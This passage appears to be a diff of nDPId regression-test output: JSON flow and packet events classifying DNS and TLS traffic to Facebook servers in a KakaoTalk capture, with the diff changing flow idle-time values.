+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1430069030703,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"thread_ts_msec":1430069030703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEBYBQANQAqICQnwAEAAAEAAAAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQAB"} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1430069030748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069030748,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGbtpgAANREvUAq8AQEKGFK8ADVgFABSeRsnwIGAAAEAAgAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAD6wAMBHN0YXIEYzEwcsAQwC4AAQABAAAACQAEHw1EVA=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1430069030978,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":80,"pkt_l4_len":44,"thread_ts_msec":1430069030978,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEAAAEAAQBHSHAoYUrwKvAEBTH4ANQAsPIiqhwEAAAEAAAAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAE="} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1430069031017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":138,"pkt_l4_len":102,"thread_ts_msec":1430069031017,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHocCwAANREA2Aq8AQEKGFK8ADVMfgBmmjSqh4GAAAEAAwAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAHADAAFAAEAAAVxAAYDYXBpwBLAMAAFAAEAAAV2AAwEc3RhcgRjMTBywBLAQgABAAEAAAARAAQfDURG"} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 